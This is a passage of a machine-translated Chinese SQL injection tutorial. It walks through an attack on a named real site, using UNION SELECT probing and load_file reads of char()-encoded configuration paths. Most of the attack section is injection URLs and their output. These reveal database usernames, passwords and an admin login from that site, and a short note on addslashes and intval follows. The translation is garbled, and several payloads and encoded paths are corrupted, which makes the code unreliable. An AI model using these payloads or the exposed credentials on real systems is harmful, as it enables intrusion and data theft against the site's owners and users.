so much below us to use it once, this test object is a famous security site - black and white The network listened to people to say that black and white has a loophole? Let's take a look. Http://www.heibai.net/down/show.php?id=5403 and 1=1 Normal display.

As shown in Figure 35 http://www.heibai.net/down/show.php?id=5403 and 1=2 is not normal. As shown in Figure 36, we continue http://www.heibai.net/down/show.php?id=5403 and 1=1 Union SELECT 1 Display results As shown in Figure 37 Note not displayed in the picture, but also comes with a Warning: mysql_fetch_object (): supplied argument is not a valid MySQL result resource in D: /web/heibai/down/show.php on line 45 Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource In d: /web/heibai/down/global.php on line 578 dizzy, the website path came out, then you will die! We continue until we guess http://www.heibai.net/down/show.php?id=5403 and 1=1 Union Select 1, 2, 3, 4, 5, 6, 7 The 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 is normally displayed.

As shown in Figure 38, our conversion statement is http://www.heibai.net/down/show.php?id=5403 and 1=2 Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 shows that the introduction is shown in Figure 39, we can speculate that this should be characterized! Ok, we look at the contents of the file following the first D: After /web/heibai/down/show.php converted to ascii to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) we view -Source: http://www.heibai.net/down/show.php? ID = 5403% 20And% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9 10, 11, loading_file (char (100, 58, 47, 119, 101, 98, 47, 105, 47, 100, 111, 119, 110, 47, 115, 104, 111, 119, 46, 112, 104, 112)), 13, 14, 15, 16, 17, 18, 19 view-source: means Seeing the source code, as for why, we will tell the source code shown in this way is shown in Figure 40. Because there is a sentence in Show.php If we submit it directly in the browser, you will find this request. ("./include/config.inc.inc.inc.inc"); Good things, you should put this configuration file, OK continues d: /web/heibai/down/include/config.inc.php transformation into char (100, 58, 47, 119, 101 , 98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) we enter http://www.heibai.net/down/show.php?id=5403 and 1 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, loading_file (char (100, 47, 104, 101, 105, 98, 97, 105, 47, 100, 111, 119, 110, 47, 105, 110 , 99, 108, 117, 100, 101, 47, 99, 111, 110, 102, 105, 1 03, 46, 105, 110, 99, 46, 112, 104, 112)), 13, 14, 15, 16, 17, 18, 19 show the results in Figure 41 mainly ................ ..... YMDOWN (Night Cat Download System) is a program that is applied to the website to provide download services // ------------------------- -------- ------------------------- // // regular setting / // ------- ------------------------------------------------ - // // Database information $ dbhost = "localhost"; // Database host name $ dbuser = "Download"; // Database User Name $ dbpasswd = "kunstar988"; // Database Code $ dbname = "

download "; // database name // Cookie name $ cookie_name =" heibai "; // version $ version =" 1.0.1 "; // table name $ down_table = ymdown; $ down_user_table = ymdown_user; $ down_sort1_table = ymdown_sort1 ; $ down_sort2_table = ymdown_sort2; halo, use the night cat's download system, and we know $ dbuser = "Download"; // Database User Name $ dbpasswd = "kunstar988"; // Database password can not be useful The table name is the default table name. We know that the night cat's administrator password is placed in ymdown_user. We continue http://www.heibai.net/down/show.php?id=5403 and 1=2 % 20Union% 20Select% 201, 2, 3, Username, 5, Password, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 from YMDown_USER results, as shown in Figure 4 We know that the file size is UserName, the application platform is Password (comparison Figure 36), UserName = DLOAD, Password = 6558428, the backstage of the Night Cat default in the admin directory, I tried didn't find it for a long time, halo. I want to directly connect MySQL and find that the Telnet port is not open.

Let's take a look else! http://www.heibai.net/vip/Article/login.php looks like a member's landing, let's take a look at D: /web/heibai/vip/article/login.php into char (100, 58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112) we enter http://www.heibai.net/down/show.php?id=5403 and 1= 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (100, 58, 404, 101, 105, 98, 97, 105, 47, 118, 105, 112, 47), 97, 114, 116, 105, 99, 108, 101, 11, 108, 111, 103, 105, 110, 46, 112, 104, 112)), 13, 14, 15, 16, 17, 18, 15 results are shown in Figure 43: REQUIRE ("./include/global.php"); Require ("./include/config .inc.php "); Require (" ./mainfunction.php "); Require (" ./function.php "); of course, let's go see config.inc.php d: / web / heibai / vip / article / include / config.inc.php converted to char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) input http://www.heibai.net/down/show.php?id=5403 and 1=2 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11, load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)), 13,14, 15, 16, 17, 18,19 Results As shown in Figure 44 shows a lot of good things. $ Dbhost = "localhost"; // Database host name $ dbuser = "root"; // Database Username $ dbpass = "234ytr8ut"; // Database Code $ DBNAME = "Article"; // Database Name $ YMCMS_USER_TABLE = "User"; $ YMCMS_USERGROUP_TABLE = "UserGroup"; $ ymcms_userrace_table = "userrace"; table or the default table, and the password of the root is available It's better to connect to its mysql, so we can find PHPMYADMIN in Into Outfile, not finding, may not use it at all.

Read C: /Winnt/php.ini discovery; magic quotes; magic quotes for incoming get / post / cookie data. Magic_quotes_gpc = on 55555555, pain, we can see if you can get a few member account guess member account is placed in User In the table, we directly read the User.myd files in the Article folder directly into Char (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100) We entered http://www.heibai.net/down/show. PHP? ID = 5403% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, loading_file (CHAR (97, 114, 116, 105, 99, 108, 101, 47, 117, 115, 101, 114, 46, 109, 121, 100) The results of 13, 14, 15, 16, 17, 18, 19 are shown in Figure 45: dizzy, there is no return. Let's read article / user.frm http://www.heibai.net/down/show.php?id=5403 and 1=2 Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, loading_file (CHAR (97, 114, 116, 105, 99, 108, 101, 114, 46, 102, 114, 109)), 13, 14, 15, 16, 17, 18, 199 results are fainting, the surface structure is in, and It is also successful when reading Article / User.myi, but why can't Article / user.myd can't read it? If we can be able to take a look at INTO OUTFILE, but ... depressed, testing is ending , The following work is still left to you! The problem described in the article has notified Xingkun! Four: Preventive methods of PHP MySQL injection. In the previous topic, there have been a lot of prevention methods. Here I will primarily talk about the prevention method of PHP MySQL injection attack. Everyone sees that many injection attacks have no effect when magic_quotes_gpc = ON. We can use this to reinforce our procedure. The addslashes () function is equivalent to magic_quotes_gpc = ON, and it is not conflict with magic_quotes_gpc = on, we can filter $ usrname = addslashes ($ usrname); $ query = "select * from users where userid = '$ usrname'); For ID types we can use the intVal () function, the intVal () function can convert the variable into an integer type so that it is possible.

转载请注明原文地址:https://www.9cbs.com/read-74886.html

9cbs

New Post(0)